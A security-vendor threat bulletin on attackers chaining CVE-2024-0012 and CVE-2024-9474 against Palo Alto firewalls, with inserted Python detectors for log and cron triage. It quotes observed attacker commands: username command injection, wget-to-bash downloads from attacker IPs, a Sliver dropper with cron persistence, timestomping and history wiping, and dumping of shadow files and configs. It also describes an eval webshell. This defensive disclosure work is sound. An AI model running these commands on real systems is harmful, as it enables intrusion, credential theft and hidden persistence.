Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices
Arctic Wolf Observes Ongoing Exploitation of Critical Palo Alto Networks Vulnerability CVE-2024-0012 Chained with CVE-2024-9474
On November 19, 2024, Arctic Wolf began observing active exploitation of the recently disclosed CVE-2024-0012 and CVE-2024-9474 vulnerabilities impacting Palo Alto Networks PAN-OS software. When chained together, these vulnerabilities allow an unauthenticated threat actor with network access to the management web interface to gain administrator privileges. Exploitation could enable threat actors to perform administrative actions, modify configurations, or leverage other authenticated privilege escalation vulnerabilities. Since our last bulletin regarding these vulnerabilities, the following has occurred:
- We have detected exploitation of CVE-2024-9474 chained with CVE-2024-0012 in customer environments. While CVE-2024-9474 is classified as a medium-severity vulnerability on its own, exploiting CVE-2024-0012 allows a threat actor to bypass authentication and gain PAN-OS administrator access to the management web interface, allowing them to escalate privileges and perform actions on the firewall with root privileges.
- Upon successful exploitation, we have observed threat actors attempting to transfer tools into the environment and exfiltrate config files from the compromised devices.
- On November 19, 2024, new technical details of CVE-2024-0012 and CVE-2024-9474 were publicly disclosed by watchTowr, which included Proof-of-Concept (PoC) exploit code.
- PAN has further specified that CVE-2024-0012 only affects PA-Series, VM-Series, and CN-Series firewalls running PAN-OS versions 10.2, 11.0, 11.1, and 11.2, as well as Panorama (virtual and M-Series) and WildFire appliances.
- In addition to identical impacted products, CVE-2024-9474 impacts PAN-OS 10.1.
Arctic Wolf assesses with high confidence that threat actors will continue targeting this vulnerability because a PoC exploit is publicly available, which lowers the barrier to exploitation. Additionally, publicly exposed firewalls are an attractive target because a compromise carries the risk of sensitive data exfiltration and further lateral movement within the environment. The exploitation of GlobalProtect earlier this year had already shown that Palo Alto Networks devices are an attractive target to threat actors.
What We Know About the Intrusions
Exploitation Details
Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.
With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:
1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME
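A defender-side triage check for the pattern above, added here as an example and not code from the Arctic Wolf bulletin: it parses PAN-OS system log CSV rows, picks out login events, and flags any username that carries shell metacharacters such as the backtick command substitution shown. The sample log lines are constructed to mirror the entry above; serial numbers and times are placeholders.

```python
import csv
import io
import re

# Constructed sample PAN-OS system log lines modelled on the bulletin's entry;
# serial numbers and times are placeholders, not real telemetry.
SAMPLE_LOGS = """\
1,2024/11/20 08:08:18,000000000001,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",000000000001,0x8000000000000000,0,0,0,0,,gw11_2,0,0,2024/11/20 08:08:18
1,2024/11/20 08:10:02,000000000001,SYSTEM,general,2562,2024/11/20 08:10:02,,general,,0,0,general,informational,"User admin logged in via Web from 10.0.0.5 using https",000000000001,0x8000000000000000,0,0,0,0,,gw11_2,0,0,2024/11/20 08:10:02
"""

# The description field (CSV column 15) of a login event.
LOGIN_RE = re.compile(r"^User (?P<user>.+?) logged in via (?P<via>.+)$")
# Shell metacharacters that a legitimate username never contains.
SHELL_META_RE = re.compile(r"`|\$\(|[;|&]")
# Web-reachable directory the observed payloads were written into.
UNAUTH_DIR = "/var/appweb/htdocs/unauth/"


def find_suspicious_logins(raw_csv):
    """Return one dict per SYSTEM login event whose username carries shell
    metacharacters, with the embedded command pulled out for triage."""
    hits = []
    for row in csv.reader(io.StringIO(raw_csv)):
        if len(row) < 15 or row[3] != "SYSTEM":
            continue
        m = LOGIN_RE.match(row[14])
        if not m or not SHELL_META_RE.search(m.group("user")):
            continue
        user = m.group("user")
        hits.append({
            "time": row[1],
            "via": m.group("via"),
            "username": user,
            "command": user.strip("`"),
            "drops_into_unauth": UNAUTH_DIR in user,
        })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_logins(SAMPLE_LOGS):
        print(hit)
```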
Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.
- watchTowr.js
- watchTowr.php
- watchTowr.txt
- CVE20249474.php
Command and Control
Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.
Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver, an open-source C2 framework used as an alternative to the commonly used Cobalt Strike penetration testing tool, was retrieved.
wget --no-check-certificate -qO- https://104.131.69.106/vicidial/vicidial_sign.js|bash
The contents of the script (vicidial_sign.js), shown below, have several key functions:
- Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and save it to the /usr/lib/e_nas path. If curl fails, it attempts to use wget instead.
- The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.
- Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
- The script then checks if a process named cloud-lib is running (pgrep -x cloud-lib), and if not, it copies /usr/lib/e_nas to /usr/bin/cloud-lib, sets its permissions to executable only by the owner (chmod 700), and then runs it in the background.
- The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
- The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
- Bash history is cleared to avoid evidence of the commands having been executed.
#!/bin/bash
curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas
touch -r /usr/lib/php.ini /usr/lib/e_nas
echo '' > /etc/cron.hourly/telemetry.cron
echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron
echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib && chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron
chmod 755 /etc/cron.hourly/telemetry.cron
touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron
echo "" > /root/.bash_history
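One way to hunt for the persistence this script sets up, added here as an example that is not from the bulletin: it audits a cron.hourly directory for the pgrep-guarded launcher pattern and for the nanosecond-identical atime/mtime pairs that touch -r leaves behind. The build_sample_dir fixture, its 0anacron file name and its timestamps are constructed for the demonstration.

```python
import os
import re
import tempfile

# Content marker taken from the telemetry.cron body described in the bulletin:
# a pgrep guard followed by copying a payload out of /usr/lib into /usr/bin.
LAUNCHER_RE = re.compile(r"pgrep -x \S+.*cp /usr/lib/\S+ /usr/bin/")


def audit_cron_dir(cron_dir):
    """Return {filename: [reasons]} for entries that resemble the persistence
    above. These are heuristics, not proof: two files from one package can
    legitimately share an mtime, so treat hits as leads for further review."""
    findings, times = {}, {}
    for name in sorted(os.listdir(cron_dir)):
        path = os.path.join(cron_dir, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        times[name] = (st.st_atime_ns, st.st_mtime_ns)
        with open(path, errors="replace") as fh:
            if LAUNCHER_RE.search(fh.read()):
                findings.setdefault(name, []).append("pgrep-guarded launcher")
    # touch -r copies atime and mtime exactly, so two unrelated scripts with
    # nanosecond-identical timestamps are the timestomping signal.
    names = list(times)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if times[a] == times[b]:
                findings.setdefault(a, []).append(f"timestamps identical to {b}")
                findings.setdefault(b, []).append(f"timestamps identical to {a}")
    return findings


def build_sample_dir(root):
    """Constructed fixture: a benign hourly job, the logrotate job used as the
    touch -r reference, and the malicious entry written by the script above."""
    benign, ref, evil = (os.path.join(root, n) for n in
                         ("0anacron", "logrotate_hourly", "telemetry.cron"))
    with open(benign, "w") as fh:
        fh.write("#!/bin/sh\n/usr/sbin/anacron -s\n")
    with open(ref, "w") as fh:
        fh.write("#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.hourly.conf\n")
    with open(evil, "w") as fh:
        fh.write("#!/bin/sh\nbash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas"
                 " /usr/bin/cloud-lib && chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'\n")
    os.utime(benign, ns=(1_690_000_000_000_000_000, 1_690_000_000_000_000_000))
    os.utime(ref, ns=(1_700_000_000_000_000_000, 1_700_000_000_000_000_000))
    st = os.stat(ref)
    os.utime(evil, ns=(st.st_atime_ns, st.st_mtime_ns))  # what touch -r does
    return root


def run_demo():
    return audit_cron_dir(build_sample_dir(tempfile.mkdtemp()))
```

Running audit_cron_dir against a real /etc/cron.hourly (or cron.d) directory is the intended use; run_demo only exercises the constructed fixture.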
The file (up.js) outlined in the section above is a UPX-packed Sliver payload.
Data Exfiltration
In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most of the exfiltrated data consisted of firewall configuration files, which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate the operating system passwd and shadow files.
Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:
cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php'
cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php'
arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php'
cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php'
cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt'
In some instances, threat actors archived the output of these files using the tar command:
tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
PHP Webshell
One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:
- When an HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
- Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
- The output is XOR encrypted and base64 encoded, then wrapped with a header consisting of the first 8 bytes of the md5sum of 18f566d952acaa29 and a footer consisting of the last 8 bytes of that same md5sum.